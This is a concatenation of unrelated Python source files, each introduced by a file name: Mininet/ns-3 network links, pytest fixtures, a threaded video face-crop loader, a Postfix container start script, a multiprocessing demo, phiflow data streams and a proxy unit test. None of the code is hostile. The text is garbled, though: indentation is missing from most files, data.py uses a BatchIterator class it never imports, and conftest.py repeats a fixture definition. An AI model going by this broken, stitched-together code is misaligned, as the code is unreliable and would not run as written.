mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Create ns-3 device.
device = ns.csma.CsmaNetDevice()
# Create queue used in the device.
queue = ns.network.DropTailQueue()
# Connect this device to the segment's channel.
device.Attach(self.channel)
# Set ns-3 device to use created queue.
device.SetQueue(queue)
device.SetAddress (ns.network.Mac48Address.Allocate ())
# Add this device to the ns-3 node.
node.nsNode.AddDevice(device)
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
class CSMALink( CSMASegment, Link ):
"""Link between two nodes using the CsmaChannel ns-3 model"""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None, DataRate=None, Delay=None ):
"""Create Ethernet link to another node, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)
DataRate: forced data rate of connected devices (optional), for example: 10Mbps, default: no-limit
Delay: channel transmission delay (optional), for example: 10ns, default: 0"""
CSMASegment.__init__( self, DataRate, Delay )
intf1 = CSMASegment.add( self, node1, port1, intfName1 )
intf2 = CSMASegment.add( self, node2, port2, intfName2 )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# The Wifi model in ns-3 is much more complicated than the wired models. Fortunately, there are many
# tutorials and examples of its usage on the net. Moreover, there is a large community of researchers
# and programmers around it.
# You can find more information about Wifi ns-3 model here:
# http://www.nsnam.org/docs/release/3.18/models/singlehtml/index.html#document-wifi
# In order to facilitate its usage, it provides a series of helpers. Helpers are objects which provide
# functions used to create and set up various components of the Wifi model.
class WIFISegment( object ):
"""Equivalent of radio WiFi channel.
Only Ap and WDS devices support SendFrom()."""
def __init__( self, enableQos=True ):
# Helpers instantiation.
self.wifihelper = ns.wifi.WifiHelper.Default()
self.wifihelper.SetStandard (ns.wifi.WIFI_PHY_STANDARD_80211g)
self.phyhelper = ns.wifi.YansWifiPhyHelper.Default()
self.channelhelper = ns.wifi.YansWifiChannelHelper.Default()
self.phyhelper.SetChannel ( self.channelhelper.Create() )
if enableQos:
self.machelper = ns.wifi.QosWifiMacHelper.Default()
else:
self.machelper = ns.wifi.NqosWifiMacHelper.Default()
def add( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with Mac type specified in
the MacHelper (default: AdhocWifiMac).
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node, 'nsNode' ) and node.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node.nsNode = ns.network.Node()
allNodes.append( node )
# Install new device to the ns-3 node, using provided helpers.
device = self.wifihelper.Install( self.phyhelper, self.machelper, node.nsNode ).Get( 0 )
mobilityhelper = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper.Install( node.nsNode )
# If port number is not specified...
if port is None:
# ...obtain it automatically.
port = node.newPort()
# If interface name is not specified...
if intfName is None:
# ...obtain it automatically.
intfName = node.name + '-eth' + repr( port )
# In the specified Mininet node, create TBIntf bridged with the 'device'.
tb = TBIntf( intfName, node, port, node.nsNode, device, mode )
return tb
def addAdhoc( self, node, port=None, intfName=None, mode=None ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with AdhocWifiMac.
Devices in that mode do not support SendFrom().
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)"""
self.machelper.SetType ("ns3::AdhocWifiMac")
return self.add( node, port, intfName, mode )
def addAp( self, node, port=None, intfName=None, mode=None, channelNumber=1, ssid="default-ssid" ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with ApWifiMac (access point).
Devices in that mode support SendFrom() (they can be used on switches).
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)
ssid: network SSID (optional)"""
self.machelper.SetType ("ns3::ApWifiMac",
"Ssid", ns.wifi.SsidValue (ns.wifi.Ssid(ssid)),
"BeaconGeneration", ns.core.BooleanValue(True),
"BeaconInterval", ns.core.TimeValue(ns.core.Seconds(2.5)))
self.phyhelper.Set ("ChannelNumber", ns.core.UintegerValue (channelNumber))
return self.add( node, port, intfName, mode )
def addSta( self, node, port=None, intfName=None, mode=None, channelNumber=1, ssid="default-ssid" ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with StaWifiMac (client station).
Devices in that mode do not support SendFrom().
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)
ssid: network SSID (optional)"""
self.machelper.SetType ("ns3::StaWifiMac",
"Ssid", ns.wifi.SsidValue (ns.wifi.Ssid(ssid)),
"ScanType", ns.core.EnumValue (ns.wifi.StaWifiMac.ACTIVE))
self.phyhelper.Set ("ChannelNumber", ns.core.UintegerValue (channelNumber))
return self.add( node, port, intfName, mode )
class WIFIApStaLink( WIFISegment, Link ):
"""Link between two nodes using infrastructure WiFi channel."""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None, ssid="default-ssid" ):
"""Create infractructure WiFi link to another node, making two new tap interfaces.
node1: first Mininet node (access point)
node2: second Mininet node (client station)
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)
ssid: network SSID (optional)"""
WIFISegment.__init__( self )
intf1 = WIFISegment.addAp( self, node1, port1, intfName1, ssid=ssid )
intf2 = WIFISegment.addSta( self, node2, port2, intfName2, ssid=ssid )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# WIFIBridgeLink uses WDSWifiMac mode, which (as for now) is not a part of ns-3 official release. You can add
# it to ns-3 using this patch: http://gist.github.com/piotrjurkiewicz/6483675
# With the infrastructure mode it is possible to connect hosts (Sta devices) with switches (Ap devices).
# However, you can't connect two switches (two Distribution Systems). In order to do that, you must use all
# four address fields in 802.11 frame. Such mode is called WDS mode or 4-address mode (4A) or even bridge mode.
class WIFIBridgeLink( WIFISegment, Link ):
"""Link between two nodes using WDS WiFi channel.
This link bridges two distribution systems, so two
switches can be connected on the both sides of link."""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None ):
"""Create WDS bridge, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)"""
WIFISegment.__init__( self )
# In this case the order of TBIntf and ns-3 device creation is reversed:
# TBIntfs (and thus tap interfaces) are created before ns-3 WifiNetDevices.
# Tap interfaces must be created earlier, because the MAC addresses of the paired
# node must be provided when setting WDSWifiMac.
# NODE 1
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node1, 'nsNode' ) and node1.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node1.nsNode = ns.network.Node()
allNodes.append( node1 )
mobilityhelper1 = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper1.Install( node1.nsNode )
# If port number is not specified...
if port1 is None:
# ...obtain it automatically.
port1 = node1.newPort()
# If interface name is not specified...
if intfName1 is None:
# ...obtain it automatically.
intfName1 = node1.name + '-eth' + repr( port1 )
# ns-3 device is not specified in the following call, so nsInstall() will not occur automatically.
tb1 = TBIntf( intfName1, node1, port1, node1.nsNode )
# NODE 2
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node2, 'nsNode' ) and node2.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node2.nsNode = ns.network.Node()
allNodes.append( node2 )
mobilityhelper2 = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper2.Install( node2.nsNode )
# If port number is not specified...
if port2 is None:
# ...obtain it automatically.
port2 = node2.newPort()
# If interface name is not specified...
if intfName2 is None:
# ...obtain it automatically.
intfName2 = node2.name + '-eth' + repr( port2 )
# ns-3 device is not specified in the following call, so nsInstall() will not occur automatically.
tb2 = TBIntf( intfName2, node2, port2, node2.nsNode )
# NODE 1
# Set Mac type and paired device Mac address for the node 1.
self.machelper.SetType ("ns3::WDSWifiMac",
"ReceiverAddress", ns.network.Mac48AddressValue( ns.network.Mac48Address( tb2.MAC() ) ) )
# Create and install WifiNetDevice.
device1 = self.wifihelper.Install( self.phyhelper, self.machelper, node1.nsNode ).Get( 0 )
# Set nsDevice in the TapBridge to the created one.
tb1.nsDevice = device1
# Install TapBridge to the ns-3 node.
tb1.nsInstall()
# NODE 2
# Set Mac type and paired device Mac address for the node 2.
self.machelper.SetType ("ns3::WDSWifiMac",
"ReceiverAddress", ns.network.Mac48AddressValue( ns.network.Mac48Address( tb1.MAC() ) ) )
# Create and install WifiNetDevice.
device2 = self.wifihelper.Install( self.phyhelper, self.machelper, node2.nsNode ).Get( 0 )
# Set nsDevice in the TapBridge to the created one.
tb2.nsDevice = device2
# Install TapBridge to the ns-3 node.
tb2.nsInstall()
#
tb1.link = self
tb2.link = self
self.intf1, self.intf2 = tb1, tb2
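# A minimal, hypothetical usage sketch of this module (not part of the original
# file): connect two Mininet hosts with a SimpleLink, start the ns-3 simulator
# thread, exchange a ping and tear everything down. Host names and IP addresses
# are illustrative assumptions; running it requires root and a working ns-3 build.
if __name__ == '__main__':
    from mininet.net import Mininet
    net = Mininet()
    h0 = net.addHost( 'h0' )
    h1 = net.addHost( 'h1' )
    link = SimpleLink( h0, h1 )
    link.intf1.setIP( '192.168.123.1', 24 )
    link.intf2.setIP( '192.168.123.2', 24 )
    start()                                  # run the simulator thread, move tap interfaces
    print( h0.cmd( 'ping -c1 192.168.123.2' ) )
    stop()                                   # stop the simulator thread
    clear()                                  # destroy ns-3 simulator state
    net.stop()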
|
conftest.py
|
import socket
from threading import Thread
from typing import Tuple
import pytest
from google.protobuf.message import Message
from singa import tensor
from src.client.app import Client
from src.proto import interface_pb2
from src.proto.utils import serialize_tensor
from src.server.app import Server
@pytest.fixture(scope="module")
def server_client() -> Tuple[socket.socket, socket.socket]:
HOST = "127.0.0.1"
PORT = 1234
s = socket.socket()
s.bind((HOST, PORT))
s.listen()
c = socket.socket()
c.connect((HOST, PORT))
s = s.accept()[0]
yield (s, c)
c.shutdown(0)
s.shutdown(0)
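# A minimal, hypothetical example of how the fixture above could be consumed
# (not part of the original conftest; in a real suite it would live in a
# test_*.py module): send a few bytes from the client socket and read them back
# on the accepted server-side socket.
def test_server_client_roundtrip(server_client):
    s, c = server_client
    c.sendall(b"ping")
    assert s.recv(4) == b"ping"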
@pytest.fixture
def protobuf() -> Message:
p = interface_pb2.WeightsExchange()
p.op_type = interface_pb2.DEFAULT
p.weights["x"] = "placeholder message".encode("utf-8")
p.weights["y"] = serialize_tensor(tensor.random((3, 3)))
return p
@pytest.fixture(scope="module")
def server_client_single() -> Tuple[Server, Client]:
server = Server(num_clients=1)
client = Client(global_rank=0)
thread_s = Thread(target=server.start)
thread_s.start()
thread_c = Thread(target=client.start)
thread_c.start()
thread_s.join()
thread_c.join()
yield (server, client)
client.close()
server.close()
@pytest.fixture(scope="module")
def server_client_single() -> Tuple[Server, Client]:
server = Server(num_clients=1)
client = Client(global_rank=0)
thread_s = Thread(target=server.start)
thread_s.start()
thread_c = Thread(target=client.start)
thread_c.start()
thread_s.join()
thread_c.join()
yield (server, client)
client.close()
server.close()
|
Video_age.py
|
import cv2
import threading
import numpy as np
class VideoLoader(object):
""" Generator of face images in the video
Invokes an additional thread to load the video frames from the file and generates cropped faces of the same size
Attributes
----------
path : Path
Path to the video file
video : cv2.VideoCapture
Video file loader
fd_rst : list of tuple of (int, dict of {str : float})
Face detection results, each item in the list is a tuple of two elements. The first element is the frame ID
and the second element is face detection results :class:`dict` with min_x, min_y, width, height, and confidence
target_size : tuple of (int, int)
The tuple has two element: (height, width), which represents the size of output face images
cache_size : int
Size of the frame pre-loading cache, unit: number of frames
batch_size : int
Batch size of the output of each iteration, i.e., number of faces in the batch
cache : None or dict of {int : np.ndarray}
Pre-loaded video frames mapping frame ID to the frames. None if :func:`reset` has not been called
last_face_loaded : None or int
Index of :attr:`fd_rst` corresponding to the last pre-loaded frame. None if :func:`reset` has not been called
num_face_generated : None or int
Index of :attr:`fd_rst`, the number of faces that have been generated. None if :func:`reset` has not been called
all_cached : bool
Whether all the frames needed to generate face images are loaded in memory
process : threading.Thread
The thread to pre-load frames from video file
cache_write_lock : threading.Lock
The lock preventing concurrent write attempt to the :attr:`cache`
"""
def __init__(self, video_path, fd_rst, age_rst, target_size, batch_size, frame_cache_size):
self.path = video_path
self.video = cv2.VideoCapture(str(video_path))
self.cache_size = frame_cache_size
self.batch_size = batch_size
self.fd_rst = list()
for frame_id, faces in fd_rst.items():
for face in faces:
self.fd_rst.append((frame_id, face))
self.age_rst = age_rst
self.target_size = target_size
self.cache = None
self.num_face_generated = None
self.last_face_loaded = None
self.all_cached = True
self.process = threading.Thread(target=self._preload_frames)
self.cache_write_lock = threading.Lock()
def __iter__(self):
self.reset()
return self
    def __len__(self):
        # __len__ must return an int; np.ceil returns a float
        return int(np.ceil(len(self.fd_rst) / self.batch_size))
def __next__(self):
if self.num_face_generated == len(self.fd_rst):
raise StopIteration
else:
# Generate the next batch of face images
img_batch = list()
video_frame_batch = list()
meta_batch = list()
while len(img_batch) != self.batch_size and self.num_face_generated != len(self.fd_rst):
# Wait for new frame to be loaded
face_meta = self.fd_rst[self.num_face_generated]
frame_id = face_meta[0]
while not self.all_cached and frame_id not in self.cache.keys():
pass
# Filter non child faces
if int(frame_id) not in self.age_rst:
self.num_face_generated += 1
if self.num_face_generated == len(self.fd_rst) or self.fd_rst[self.num_face_generated][0] != frame_id:
self.cache.pop(frame_id)
continue
# Load the next image
frame = self.cache[frame_id]
min_x = max(0, int(round(face_meta[1]['min_x'], 0)))
min_y = max(0, int(round(face_meta[1]['min_y'], 0)))
width = min(frame.shape[1]-min_x, int(round(face_meta[1]['width'], 0)))
height = min(frame.shape[0]-min_y, int(round(face_meta[1]['height'], 0)))
face = frame[min_y:min_y+height, min_x:min_x+width, :]
face = self._resize_face(face)
img_batch.append(face)
meta_batch.append(face_meta)
# Zoom out the face for iMotion Expression detection
center_x = min_x + width / 2
center_y = min_y + height / 2
half_target_size = max(width, height)
space_x_left = center_x - half_target_size
space_x_right = frame.shape[1] - center_x - half_target_size
space_y_top = center_y - half_target_size
space_y_bot = frame.shape[0] - center_y - half_target_size
if space_x_left + space_x_right >= 0:
if space_x_left < 0:
space_x_right += space_x_left
space_x_left = 0
if space_x_right < 0:
space_x_left += space_x_right
space_x_right = 0
else:
diff = abs(space_x_left + space_x_right)
space_y_top += diff / 2
space_y_bot += diff / 2
space_x_left = 0
space_x_right = 0
if space_y_top + space_y_bot >= 0:
if space_y_top < 0:
space_y_bot += space_y_top
space_y_top = 0
if space_y_bot < 0:
space_y_top += space_y_bot
space_y_bot = 0
else:
diff = abs(space_y_top + space_y_bot)
space_x_left += diff / 2
space_x_right += diff / 2
space_y_top = 0
space_y_bot = 0
space_x_left = int(round(space_x_left, 0))
space_x_right = int(round(space_x_right, 0))
space_y_top = int(round(space_y_top, 0))
space_y_bot = int(round(space_y_bot, 0))
#print(space_x_left, space_x_right, space_y_top, space_y_bot, frame.shape[1], frame.shape[0])
#print(space_x_left, frame.shape[1]-space_x_right, space_y_top, frame.shape[0]-space_y_bot)
video_frame = frame[space_y_top:(frame.shape[0]-space_y_bot), space_x_left:(frame.shape[1]-space_x_right), :]
#print(frame.shape, video_frame.shape)
video_frame = self._resize_face(video_frame)
                video_frame_batch.append(frame)  # NOTE: appends the full frame; use video_frame here to keep the zoomed-out crop computed above
# Update status
self.num_face_generated += 1
if self.num_face_generated == len(self.fd_rst) or self.fd_rst[self.num_face_generated][0] != frame_id:
self.cache.pop(frame_id)
print('{}: {} faces have been generated'.format(self.path.stem, self.num_face_generated))
return np.array(img_batch), meta_batch, np.array(video_frame_batch)
@property
def num_frame_in_cache(self):
return len(self.cache)
def _preload_frames(self):
""" Pre-load video frames
Load frames from :attr:`self.video` and store into :attr:`self.cache`.
This function will be executed by :attr:`self.process`
Raises
------
IOError
Cannot retrieve a needed frame from the video file
"""
while not self.all_cached:
if self.num_frame_in_cache < self.cache_size:
if self._load_next_frame():
self.all_cached = True
def _load_next_frame(self):
""" Load a single frame
Load the next unloaded frame needed for face image generation from :attr:`self.video`
and store into :attr:`self.cache`
Returns
-------
hitting_end : bool
Whether all the required video frames are loaded
Raises
------
IOError
Cannot retrieve a needed frame from the video file
"""
# Determine which frame to load
face_to_load = self.last_face_loaded + 1
if self.last_face_loaded != -1:
if face_to_load == len(self.fd_rst):
return True
while self.fd_rst[face_to_load][0] == self.fd_rst[self.last_face_loaded][0]:
face_to_load += 1
if face_to_load == len(self.fd_rst):
return True
# Load the frame
frame_to_load = self.fd_rst[face_to_load][0]
with self.cache_write_lock:
self.video.set(cv2.CAP_PROP_POS_FRAMES, int(frame_to_load))
ret, frame = self.video.read()
if ret:
self.cache[frame_to_load] = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.last_face_loaded = face_to_load
return False
else:
# TODO: Handle the error
                #raise IOError('Failed to load frame {} of the video'.format(frame_to_load))
                self.last_face_loaded = face_to_load
                print(IOError('Failed to load frame {} of the video'.format(frame_to_load)))
def _resize_face(self, face_img):
""" Resize the face image to the target size
Parameters
----------
face_img: np.ndarray
Face image to be resized
Returns
-------
resized_img : np.ndarray
Resized face image
"""
return cv2.resize(face_img, self.target_size)
def reset(self):
""" Reset the face image generator and ready to generate images based on the current configuration """
with self.cache_write_lock:
# Attempt to terminate the previous pre-loading process gracefully
self.all_cached = True
if self.process.is_alive():
del self.process
# Re-initiate the generator
self.cache = dict()
self.last_face_loaded = -1 # Indicate to load the first required frame
self.num_face_generated = 0
self.all_cached = False
# Restart the pre-loading
self.process = threading.Thread(target=self._preload_frames)
self.process.start()
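# Usage sketch (hypothetical inputs; only the iterator protocol defined above is assumed):
# a VideoLoader is consumed as an iterator yielding (face_batch, meta_batch, frame_batch), e.g.
#
#     loader = VideoLoader(video_path, fd_rst, age_rst,
#                          target_size=(224, 224), batch_size=32, frame_cache_size=64)
#     for face_batch, meta_batch, frame_batch in loader:
#         predictions = age_model.predict(face_batch)  # age_model is hypothetical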
|
run.py
|
#!/usr/local/bin/python3
#
## bootstrap to serve local files and run the api server
#
import http.server, socketserver, threading
# TODO: this Flask app currently points at the test API; once the API server is complete, update this import:
from api import api as apiServer
API_PORT = 8002
HTTP_PORT = 8001
def run():
try:
httpd = socketserver.TCPServer(('0.0.0.0', HTTP_PORT), http.server.SimpleHTTPRequestHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
print('[+] HTTP Server running on port '+str(HTTP_PORT)+"...")
apiServer.initDB()
apiServer.app.config['ENV'] = 'development'
apiServer.app.run(host='0.0.0.0',port=API_PORT)
    except KeyboardInterrupt:
        print('[+] Shutting down')
        httpd.shutdown()  # threading.Thread has no stop(); shut the HTTP server down instead
        exit(0)
run()
exit(0)
|
start.py
|
#!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys
from podop import run_server
from pwd import getpwnam
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(getpwnam('postfix').pw_uid)
os.mkdir('/dev/shm/postfix',mode=0o700)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
# TODO: Remove verbosity setting from Podop?
run_server(0, "postfix", "/tmp/podop.socket", [
("transport", "url", url + "transport/§"),
("alias", "url", url + "alias/§"),
("dane", "url", url + "dane/§"),
("domain", "url", url + "domain/§"),
("mailbox", "url", url + "mailbox/§"),
("recipientmap", "url", url + "recipient/map/§"),
("sendermap", "url", url + "sender/map/§"),
("senderaccess", "url", url + "sender/access/§"),
("senderlogin", "url", url + "sender/login/§"),
("senderrate", "url", url + "sender/rate/§")
])
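    # Presumably each "§" placeholder above marks where podop substitutes the key being looked up,
    # e.g. a transport lookup for example.com would query .../internal/postfix/transport/example.com
    # (illustrative only; the exact substitution is defined by podop's run_server).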
def start_mta_sts_daemon():
os.chmod("/root/", 0o755) # read access to /root/.netrc required
os.setuid(getpwnam('postfix').pw_uid)
from postfix_mta_sts_resolver import daemon
daemon.main()
def is_valid_postconf_line(line):
    return not line.startswith("#") and line != ''
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")
for postfix_file in glob.glob("/conf/*.cf"):
conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
if os.path.exists("/overrides/mta-sts-daemon.yml"):
shutil.copyfile("/overrides/mta-sts-daemon.yml", "/etc/mta-sts-daemon.yml")
else:
conf.jinja("/conf/mta-sts-daemon.yml", os.environ, "/etc/mta-sts-daemon.yml")
if not os.path.exists("/etc/postfix/tls_policy.map.lmdb"):
open("/etc/postfix/tls_policy.map", "a").close()
os.system("postmap /etc/postfix/tls_policy.map")
if "RELAYUSER" in os.environ:
path = "/etc/postfix/sasl_passwd"
conf.jinja("/conf/sasl_passwd", os.environ, path)
os.system("postmap {}".format(path))
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
multiprocessing.Process(target=start_mta_sts_daemon).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.system("postfix start-fg")
|
mp_process01.py
|
## How the placement of start() and join() affects the output ordering.
from multiprocessing import Process
import os
# child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',)) # create a child process
#p.start()
#p.join()
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
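# Added note (not in the original script): with the placement above, the parent prints
# 'Child process will start.' before the child is launched, and p.join() makes the parent wait
# for the child before printing 'Child process end.'. If the commented-out p.start()/p.join()
# near the top were used instead (and the later pair removed), the child's output would appear
# before 'Child process will start.', e.g. (PIDs illustrative):
#
#     Parent process 1000.
#     Run child process test (1001)...
#     Child process will start.
#     Child process end.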
|
data.py
|
from __future__ import print_function
import threading
import time
from phi.physics.field.staggered_grid import StaggeredGrid
from .stream import DerivedStream
class Interleave(DerivedStream):
def __init__(self, fields):
DerivedStream.__init__(self, fields)
self.field_count = len(fields)
def shape(self, datasource):
return self.input_fields[0].shape(datasource)
def size(self, datasource):
return sum([f.size(datasource) for f in self.input_fields])
def get(self, datasource, indices):
for index in indices:
yield self.input_fields[index % self.field_count].get(datasource, index // self.field_count)
class Transform(DerivedStream):
def __init__(self, transformation, field):
DerivedStream.__init__(self, [field])
self.field = self.input_fields[0]
self.transformation = transformation
def shape(self, datasource):
return self.field.shape(datasource)
def size(self, datasource):
return self.field.size(datasource)
def get(self, datasource, indices):
for index in indices:
yield self.transformation(self.field.get(datasource, index))
class AsyncBatchIterator(BatchIterator):
def __init__(self, batch_iterator, logf=None):
# type: (BatchIterator, function) -> AsyncBatchIterator
BatchIterator.__init__(self, batch_iterator.database, batch_iterator.dataset, batch_iterator.iterator_generator, cache=False)
self.it = batch_iterator
self.batches = []
self.batch_ready = threading.Event()
self.progressed = threading.Event()
self.alive = True
self.logf = logf
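        # Prefetch on a background thread: next_loop() keeps up to two batches buffered ahead of
        # the consumer and signals availability via the batch_ready event.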
threading.Thread(target=self.next_loop).start()
def get_batch(self, streams=None, subrange=None):
self.batch_ready.wait()
# print("Retrieving batch %d" % self.index)
if not self.batches:
raise RuntimeError("get_batch failed in AsyncBatchIterator")
return self.batches[0]
def progress(self):
BatchIterator.progress(self)
# print("Progress to batch %d" % self.index)
del self.batches[0]
if not self.batches:
self.batch_ready.clear()
self.progressed.set()
def next_loop(self):
while self.alive:
while len(self.batches) < 2:
time_before = time.time()
self.batches.append(self.it.get_batch())
duration = time.time() - time_before
self.logf and self.logf("Retrieving batch %d took %f seconds." % (self.it.index, duration))
self.batch_ready.set()
self.it.progress()
self.progressed.wait()
self.progressed.clear()
def __del__(self):
self.alive = False
|
proxy_creation_test.py
|
import queue
from abc import ABC, abstractmethod
from threading import Thread
from time import sleep
from typing import Any, Dict, List, Tuple, cast
from unittest import TestCase
from puma.attribute import ProcessAction, ThreadAction, manually_managed
from puma.attribute.mixin import ScopedAttributesCompatibilityMixin
from puma.buffer import Buffer, MultiThreadBuffer
from puma.helpers.testing.logging.capture_logs import CaptureLogs
from puma.logging import LogLevel
from puma.runnable.proxy import Proxy
from puma.runnable.remote_execution import BaseRemoteObjectReference
from tests.runnable.proxy.proxy_test_helpers import AllMethodsReturnNone, CallResponse, HasMethodThatReturnsValue, Parent, ParentImpl, SendsCallsToBufferImpl
class ProxyCreationTest(TestCase):
def test_ensure_an_error_raised_if_proxy_used_without_context_management(self) -> None:
proxy = Proxy(AllMethodsReturnNone, None)
with self.assertRaisesRegex(RuntimeError, "Must be context managed"):
proxy.get_runner()
with self.assertRaisesRegex(RuntimeError, "Must be context managed"):
proxy.get_facade()
def test_no_error_raised_if_interface_has_only_methods_that_return_none(self) -> None:
with MultiThreadBuffer[CallResponse](10, "Test Buffer") as feedback_buffer:
real_impl = SendsCallsToBufferImpl(feedback_buffer)
with Proxy(AllMethodsReturnNone, real_impl) as proxy_1:
proxy_1.get_facade()
with Proxy(PartialProxyThatImplementsMethodWithReturnValue, real_impl) as proxy_2:
proxy_2.get_facade()
def test_error_raised_if_incorrect_arguments_given(self) -> None:
with MultiThreadBuffer[CallResponse](10, "Test Buffer") as feedback_buffer:
real_impl = SendsCallsToBufferImpl(feedback_buffer)
with Proxy(AllMethodsReturnNone, real_impl) as proxy:
facade = proxy.get_facade()
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.no_args("an arg") # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'a'"):
facade.one_arg() # type: ignore
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.one_arg("one", "two") # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'a'"):
facade.two_args() # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'b'"):
facade.two_args("one") # type: ignore
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.two_args("one", "two", "three") # type: ignore
def test_ensure_accidentally_un_decorated_methods_work_as_expected(self) -> None:
all_call_recorder = MethodCallRecorder(["decorated_method"])
with Proxy(InterfaceWithOneMissingDecorator, cast(InterfaceWithOneMissingDecorator, all_call_recorder)) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
# Ensure calling decorated_method doesn't raise an error
facade.decorated_method()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_method wasn't decorated"):
facade.undecorated_method()
# Ensure that only a call to decorated_method was requested
commands: CallLog = all_call_recorder._call_log
self.assertEqual(1, len(commands))
self.assertEqual(commands["decorated_method"], ((), {}))
def test_ensure_accidentally_un_decorated_methods_work_as_expected_in_extended_interfaces(self) -> None:
all_call_recorder = MethodCallRecorder(["decorated_method", "decorated_extended"])
with Proxy(ExtendedInterfaceWithMissingDecorator, cast(ExtendedInterfaceWithMissingDecorator, all_call_recorder)) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
# Ensure calling decorated_method doesn't raise an error
facade.decorated_method()
facade.decorated_extended()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_method wasn't decorated"):
facade.undecorated_method()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_extended wasn't decorated"):
facade.undecorated_extended()
# Ensure that only a call to decorated_method was requested
commands: CallLog = all_call_recorder._call_log
self.assertEqual(2, len(commands))
self.assertEqual(commands["decorated_method"], ((), {}))
self.assertEqual(commands["decorated_extended"], ((), {}))
def test_proxy_erroneously_passed_to_thread_shows_warning(self) -> None:
with Proxy(Parent, ParentImpl()) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
with CaptureLogs() as log_context:
# Retrieve a proxy of SubObject
sub_object = facade.get_sub_object()
# Ensure its initial state is correct
